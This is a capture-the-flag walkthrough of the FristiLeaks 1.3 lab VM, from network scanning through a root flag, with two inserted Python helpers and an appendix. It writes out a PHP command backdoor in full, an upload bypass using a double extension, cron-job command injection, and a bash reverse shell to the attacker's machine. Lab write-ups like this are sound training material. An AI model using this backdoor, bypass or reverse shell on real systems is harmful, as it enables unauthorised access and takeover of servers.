vulnhub.com fristileaks1.3


host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * /cola/ only says it's not the URL we're looking for; the index page says to keep calm and drink fristi, so try /fristi/
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read the description meta tag and the comment regarding base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk
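
Added example (not part of the original notes): the same extraction done above by hand in vi (delete other lines, join, strip spaces, base64 -d, file), but as a script that pulls every HTML comment out of a page, keeps the ones that are pure base64, decodes them and classifies the result by magic bytes. The sample page and the 1x1 PNG inside it are constructed stand-ins for /fristi/index.html and img2.png; nothing here touches the VM.

```python
import base64
import re
import struct
import textwrap
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Magic bytes for the three image types the upload form later accepts
MAGIC = {
    PNG_SIG: "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_tiny_png() -> bytes:
    """Build a valid 1x1 greyscale PNG (constructed stand-in for the VM's img2.png)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x80")                    # filter byte + one pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


def build_sample_page() -> str:
    """Constructed stand-in for /fristi/index.html: a dev comment plus a line-wrapped base64 image comment."""
    blob = "\n".join(textwrap.wrap(base64.b64encode(make_tiny_png()).decode("ascii"), 76))
    return (
        '<html><head>\n'
        '<meta name="description" content="login-test page. images are base64 encoded inline in the HTML.">\n'
        '</head><body>\n'
        '<!--\nTODO: clean this up before production\n- by eezeepz\n-->\n'
        '<!--\n' + blob + '\n-->\n'
        '</body></html>\n'
    )


COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def sniff(data: bytes) -> str:
    """Same check `file img2` did: classify by leading magic bytes."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def extract_base64_blobs(html: str, min_len: int = 64):
    """Return [(kind, bytes)] for every HTML comment that is a base64 blob.
    Whitespace and newlines are stripped first, the same as the join-lines and
    strip-spaces steps done in vi above."""
    found = []
    for body in COMMENT_RE.findall(html):
        compact = re.sub(r"\s+", "", body)
        if len(compact) < min_len or not B64_RE.match(compact):
            continue  # prose comments such as the TODO are skipped here
        try:
            decoded = base64.b64decode(compact, validate=True)
        except ValueError:  # bad padding/length; binascii.Error is a ValueError subclass
            continue
        found.append((sniff(decoded), decoded))
    return found


if __name__ == "__main__":
    for kind, data in extract_base64_blobs(build_sample_page()):
        print(f"{kind}: {len(data)} bytes")
```

Run it against a saved copy of the real page with `extract_base64_blobs(open("index.html").read())`; anything that sniffs as "unknown" is worth a closer look, since a comment that decodes but is not an image is usually text someone meant to hide.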

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded, then tried to connect:
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed python issues (weevely needed the PySocks module)
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old php script (see appendix) to execute commands
  * renamed to shell.php.jpg: the upload check only looks at the last extension, but Apache's PHP handler is often bound to .php anywhere in a multi-extension name (AddHandler), so the file is still executed as PHP (likely reason; server config not checked)
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owned by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * encode is base64, then reverse the string, then rot13 (so decode is rot13, un-reverse, base64 decode)
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
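
Added example (not the VM's cryptpass.py and not the decryptpass.py in the appendix): both directions of the scheme in python 3, checked against the two values recovered above. It also shows the give-away that made the scheme easy to spot: base64 padding only ever sits at the end of a string, so a ciphertext starting with "=" (like the whoisyourgodnow.txt value) means the base64 was reversed, and rot13 never touches "=".

```python
import base64
import codecs


def encode_string(plain: str) -> str:
    """The scheme as read from /home/admin/cryptpass.py: base64, reverse, rot13."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(crypted: str) -> str:
    """Inverse of encode_string. rot13 is its own inverse and acts per character,
    so it commutes with the reversal; here: rot13, un-reverse, base64-decode."""
    b64 = codecs.encode(crypted, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def looks_reversed_base64(s: str) -> bool:
    """Tell-tale for this scheme: '=' padding only ends a base64 string, so a
    leading '=' with no trailing one means the ciphertext was reversed."""
    return s.startswith("=") and not s.endswith("=")


if __name__ == "__main__":
    for c in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        print(c, "->", decode_string(c), "| reversed-b64 hint:", looks_reversed_base64(c))
```

The 20-character value has no padding because "thisisalsopw123" is 15 bytes, a multiple of 3, which is why only the second ciphertext shows the leading "=".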
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: setuid/setgid bits set on doCom, owned by root:root (so it runs as root whoever invokes it)
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
// minimal command backdoor (deliberately unsafe: runs whatever ?cmd= or POST cmd= says)
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);           // command output goes straight into the response
  echo "<pre>$cmd</pre>"; // echo the command back for reference
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>

-- end of old script


// modified cryptpass.py script
-- start of decryptpass.py script --
import base64, codecs, sys

# encodeString is the routine from /home/admin/cryptpass.py: base64, reverse, rot13
# (kept for reference, converted for python 3)
#def encodeString(plain):
#    base64string = base64.b64encode(plain.encode()).decode()
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(crypted):
    # rot13 is its own inverse and works per character, so undoing it before
    # un-reversing is fine; then base64 decode
    rottedString = codecs.encode(crypted[::-1], 'rot13')
    return base64.b64decode(rottedString).decode()

if len(sys.argv) != 2:
    sys.exit("usage: decryptpass.py <crypted>")

decryptedResult = decodeString(sys.argv[1])
print(decryptedResult)
-- end of decryptpass.py script --
